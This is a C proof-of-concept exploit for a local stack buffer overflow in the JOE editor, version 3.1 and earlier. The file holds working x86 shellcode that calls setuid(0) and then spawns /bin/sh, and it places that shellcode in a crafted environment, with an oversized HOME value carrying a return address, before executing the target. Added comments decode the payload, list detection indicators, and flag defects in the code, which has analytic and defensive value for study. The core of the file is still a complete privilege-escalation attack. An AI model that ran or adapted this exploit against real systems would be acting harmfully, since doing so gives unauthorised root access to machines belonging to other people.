/* joe_bof.c
 *
 * JOE <= 3.1 local buffer overflow exploit (Proof of Concept)
 *
 * Tested in Slackware Linux 10.0
 *
 * by CoKi <coki@nosystem.com.ar>
 * No System Group - http://www.nosystem.com.ar
 */

#include <stdio.h>
#include <strings.h>

/* Size in bytes of both stack arrays in main() (buf and tmp). main() fills
 * the first BUFFER-4 bytes of buf with padding and appends an address after
 * them, so this constant fixes the length of the value exported as HOME. */
#define BUFFER 1056

/*
 * Raw machine-code payload, exported verbatim by main() in the SHELLCODE
 * environment variable.
 *
 * Analyst notes (from reading the bytes, not from running them):
 *  - The bytes decode as 32-bit x86 Linux code that issues system calls with
 *    `int 0x80` (\xcd\x80 occurs twice).
 *  - First call: eax = 0x17, ebx = 0, i.e. setuid(0) on i386 Linux.
 *  - Second call: eax = 0x0b (execve), reached through a jmp/call/pop
 *    sequence that locates the trailing string at run time.
 *  - The trailing bytes \x2f\x62\x69\x6e\x2f\x73\x68 are ASCII "/bin/sh";
 *    the final \x58 ('X') is a placeholder that the code overwrites with a
 *    NUL terminator.
 *  - The array holds no \x00 byte before its end, so strlen() and setenv()
 *    in main() see the whole payload.
 *
 * Detection: an environment string containing this byte pattern, or "/bin/sh"
 * next to int 0x80 opcodes, is a strong indicator of a staged payload.
 */
char shellcode[]=
	"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
	"\xeb\x17\x5e\x89\x76\x08\x31\xc0"
	"\x88\x46\x07\x89\x46\x0c\xb0\x0b"
	"\x89\xf3\x8d\x4e\x08\x31\xd2\xcd"
	"\x80\xe8\xe4\xff\xff\xff\x2f\x62"
	"\x69\x6e\x2f\x73\x68\x58";

/* Prints the usage line and exits with status 1; defined below main(). */
void use(char *program);

/*
 * Build a crafted environment and exec the program named by argv[1].
 *
 * The only argument is the path of the target binary (per the file header,
 * JOE <= 3.1). The function sets two environment variables, HOME (padding
 * plus a 4-byte address) and SHELLCODE (the payload array), and then replaces
 * this process with the target, which inherits both.
 *
 * Defender's view:
 *  - The root cause lives in the target, not here: presumably JOE <= 3.1
 *    copies $HOME into a fixed-size stack buffer without a length check.
 *    That code is not visible in this file; confirm against the JOE source.
 *  - Observable artefact: a process started with a HOME value of about 1 KB
 *    of 'A' bytes, plus a SHELLCODE variable holding non-printable bytes.
 *  - The address below is a compile-time constant, so the PoC appears to
 *    assume a fixed 32-bit stack layout and an executable stack. Address
 *    space randomisation and non-executable stacks break those assumptions;
 *    upgrading JOE past the version named in the header removes the bug.
 *
 * Exits with status 1 when the argument count is wrong or the path cannot be
 * opened. Has no return statement; control reaches the end of main() only if
 * execl() fails.
 */
int main(int argc, char *argv[]) {

	FILE *file;
	char buf[BUFFER], *path, tmp[BUFFER];
	char *buffer=buf;
	int ret;

	/* Exactly one argument is required; use() does not return. */
	if(argc != 2) use(argv[0]);
	
	path = argv[1];

	/* Existence/readability check only: the stream is never read and never
	 * closed before the exec below. */
	if((file = fopen(path, "r")) == NULL) {
		printf(" Failed to open file!\n");
		exit(1);
	}

	/* Hard-coded address minus the payload and path lengths. Presumably a
	 * guess at where the SHELLCODE string will sit near the top of the
	 * target's stack on the tested system (Slackware 10.0 per the header);
	 * nothing in this file verifies it. */
	ret = 0xbffffffa - strlen(shellcode) - strlen(path);
	
	/* Zero the whole array, then fill all but the last 4 bytes with 'A'.
	 * buffer aliases buf, so buf is now a 1052-character C string. */
	bzero(buf, sizeof(buf));
	memset(buffer, 'A', BUFFER-4);

	/* The bytes of the int are formatted as if they were a C string and at
	 * most 4 of them are appended to the padding.
	 * NOTE(review): &ret is an int *, not a char *, so the %s conversion is a
	 * type mismatch, and copying stops at the first zero byte rather than
	 * after sizeof(int) bytes.
	 * NOTE(review): buf already holds BUFFER-4 characters; appending 4 more
	 * makes strncat() write its terminating NUL at buf[BUFFER], one byte
	 * past the end of the array. */
	sprintf(tmp, "%s", &ret);
	strncat(buf, tmp, 4);

	printf("\n joe <= 3.1 local stack buffer overflow (Proof of Concept)\n");
	printf(" by CoKi <coki@nosystem.com.ar>\n\n");

	/* Overwrite any existing values (third argument 1). Return values are
	 * not checked. */
	setenv("HOME", buf, 1);
	setenv("SHELLCODE", shellcode, 1);

	/* Replace this process image with the target; the environment set above
	 * is inherited. A failed exec is not reported. */
	execl(path, path, NULL);

}

/*
 * Print the one-line usage message to standard output and terminate the
 * process with exit status 1. Never returns to the caller.
 *
 * program: name to show in the message (main() passes argv[0]).
 */
void use(char *program) {
	fprintf(stdout, " Use: %s <path>\n", program);
	exit(1);
}

